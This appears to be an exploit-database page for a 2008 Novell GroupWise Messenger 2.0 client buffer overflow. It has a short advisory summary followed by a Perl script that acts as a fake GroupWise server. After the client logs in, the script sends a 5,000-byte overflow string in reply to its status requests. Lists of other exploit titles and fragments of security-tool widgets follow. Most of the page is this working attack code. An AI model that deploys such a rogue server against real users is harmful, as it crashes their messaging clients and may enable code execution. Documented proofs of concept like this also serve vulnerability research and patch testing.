Menu

Search for hundreds of thousands of exploits

"Novell Groupwise Messenger 2.0 Client - Buffer Overflow"

Author

Exploit author

"Francisco Amato"

Platform

Exploit platform

novell

Release date

Exploit published date

2008-07-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
source: https://www.securityfocus.com/bid/29602/info

Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer.

Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Novell GroupWise Messenger 2.0.3 HP1 are vulnerable.

#!/usr/bin/perl -w

##
#Simple fake groupwise msn server.
#Date: 07/02/2008
#[ISR] - www.infobyte.com.ar
#Author: Francisco Amato
##

use strict;
use IO::Socket;
use Data::Dump qw(dump);

my $port=8300;
my $conn="HTTP/1.0 200 \r\nDate: Sat, 12 Jan 2008 01:28:59 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000\0\n\0\b\0\0\0Surname\0\6\0\0\0Amato\0\n\0\n\0\0\0Full Name\0\20\0\0\0Client Name    \0\n\0\13\0\0\0Given Name\0\n\0\0\0Client   \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0xxxxx\@xxxxxxxx.com.xx\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=INFOBYTEXX\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0";
my $resp="HTTP/1.0 200 \r\nDate: Fri, 04 Jan 2008 09:55:40 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00c0d3\0\0";
my $crash="A"x5000;
#initial
&main;

##########################################################################
# FUNCTION	main
# RECEIVES
# RETURNS
# EXPECTS
# DOES		application's startup
sub main {

    #ignore child's process
    $SIG{CHLD} = 'IGNORE';

    my $listen_socket = IO::Socket::INET->new(LocalPort => $port,
					      Listen => 10,
					      Proto => 'tcp',
					      Reuse => 1);

    die "Cant't create a listening socket: $@" unless $listen_socket;

    print "[ISR] www.infobyte.com.ar - Francisco Amato\n";
    print "[Groupwise Messager] Fake Server ready. Waiting for connections ... \n";

    #esperar conexiones
    while (my $connection = $listen_socket->accept){

	my $child;
	# crear el fork para salir
	die "Can't fork: $!" unless defined ($child = fork());

	#child
	if ($child == 0){

	    #close socket
	    $listen_socket->close;

	    #process request
	    &client($connection);

	    exit 0;
	}
	#father
	else{

	    warn "Connecton recieved ... ",$connection->peerhost,"\n";

	    #close connection
	    $connection->close();

	}
    }
}
##########################################################################
# FUNCTION	client
# RECEIVES
# RETURNS
# EXPECTS
# DOES		process client request
sub client{

    my ($socket) = @_;
    my $st=2; #initial code

    $|=1;

    my $rp;
    my $data = <$socket>;
    pdata($data);
    if ($data =~ /POST \/login/){
	$data = <$socket>;
	pdata($data);
	$data = <$socket>;
	pdata($data);
	$data = <$socket>;
	pdata($data);
	printf $socket $conn;
	pdata($conn,1);
	while ($data = <$socket>){ #commands
	    if ($data =~ /POST \/setstatus/){

		pdata($data);
		$data = <$socket>;
		pdata($data);
		$data = <$socket>;
		pdata($data);

		$rp=$resp;
		$rp =~ s/c0d3/$st/g;
		$rp .=$crash;
		printf $socket $rp;
		pdata($rp,1);
		$st++;

	    }else{
		pdata("ELSE -". $data);
	    }
	}
    }
    close($socket);

}
##########################################################################
# FUNCTION	pdata
# RECEIVES
# RETURNS
# EXPECTS
# DOES		debug information
sub pdata {
    my ($data,$orden) =@_;
    if ($orden){
	print "[SERVER] - ";
    }else{
	print "[CLIENT] - ";
    }
    print dump($data) . "\n";
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-11-08 "Novell Groupwise 8.0 - Multiple Remote Vulnerabilities" dos novell "Francis Provencher"
2010-09-07 "Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow" dos novell Abysssec
2010-09-01 "Novell Netware 6.5 - OpenSSH Remote Stack Overflow" dos novell "Francis Provencher"
2010-06-24 "Novell iManager - Multiple Vulnerabilities" dos novell "Core Security Technologies"
2010-06-17 "Netware - SMB Remote Stack Overflow (PoC)" dos novell "laurent gaffie"
2010-03-14 "Novell eDirectory 8.8.5 - DHost Weak Session Cookie Session Hijacking (Metasploit)" remote novell Metasploit
2010-01-06 "Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow" remote novell "His0k4 & Simo36"
2009-11-12 "Novell eDirectory 8.8 - '/dhost/modules?I:' Remote Buffer Overflow" remote novell HACKATTACK
2009-10-01 "Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting" webapps novell "Francis Provencher"
2009-09-23 "Novell Edirectory 8.8 SP5 - Cross-Site Scripting" webapps novell "Francis Provencher"
Release Date Title Type Platform Author
2008-07-02 "Novell Groupwise Messenger 2.0 Client - Buffer Overflow" dos novell "Francisco Amato"
2006-08-29 "IBM eGatherer 3.20.0284.0 - ActiveX Remote Code Execution (Metasploit)" remote windows "Francisco Amato"
2005-09-27 "Novell Groupwise Client 6.5.3 - Local Integer Overflow" dos windows "Francisco Amato"
2005-07-15 "Novell Groupwise 6.5 Webaccess - HTML Injection" webapps java "Francisco Amato" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected